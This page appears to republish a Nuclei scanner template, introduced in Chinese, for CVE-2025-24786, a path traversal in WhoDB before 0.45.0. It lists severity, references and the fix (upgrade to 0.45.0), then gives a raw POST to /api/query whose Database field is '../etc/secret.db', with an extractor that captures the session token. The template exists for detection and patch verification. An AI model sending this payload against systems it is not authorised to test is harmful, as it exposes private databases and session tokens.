CVE-2025-24786: WhoDB < 0.45.0 - Path Traversal

日期: 2026-02-03 | 影响软件: 未知 | POC: 已公开

漏洞描述

WhoDB contains a path traversal caused by lack of validation when opening database files, letting unauthenticated attackers access arbitrary Sqlite3 databases on the host system, exploit requires attacker to manipulate database filename input.

PoC代码[已公开]

id: CVE-2025-24786

info:
  name: WhoDB < 0.45.0 - Path Traversal
  author: basicbeny
  severity: high
  description: |
    WhoDB contains a path traversal caused by lack of validation when opening database files, letting unauthenticated attackers access arbitrary Sqlite3 databases on the host system, exploit requires attacker to manipulate database filename input.
  impact: |
    Attackers can access any Sqlite3 database on the system, potentially exposing sensitive data.
  remediation: |
    Upgrade to version 0.45.0 or later.
  reference:
    - https://github.com/clidey/whodb
    - https://github.com/clidey/whodb/security/advisories/GHSA-9r4c-jwx3-3j76
    - https://nvd.nist.gov/vuln/detail/CVE-2025-24786
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-24786
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    vendor: clidey
    product: whodb
    fofa-query: body="whodb"
  tags: cve,cve2025,whodb,lfi,pathtraversal,unauth

http:
  - raw:
      - |
        POST /api/query HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"operationName":"Login","variables":{"credentials":{"Type":"Sqlite3","Hostname":"","Database":"../etc/secret.db","Username":"","Password":"","Advanced":[]}},"query":"mutation Login($credentials: LoginCredentials!) {\n  Login(credentials: $credentials) {\n    Status\n    __typename\n  }\n}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"Status":true'
          - '"StatusResponse"'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: header
        name: token
        group: 1
        regex:
          - 'Token=([^;]+)'
# digest: 4a0a00473045022100c3d7c5b1760b0c65b8db96230045cc9a0e7e6c8b31ab770665f1156f7fff6746022071541284a708954c3783a76af45977fdef80c3069e5a570bff55db0412ba5a99:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-24786.yaml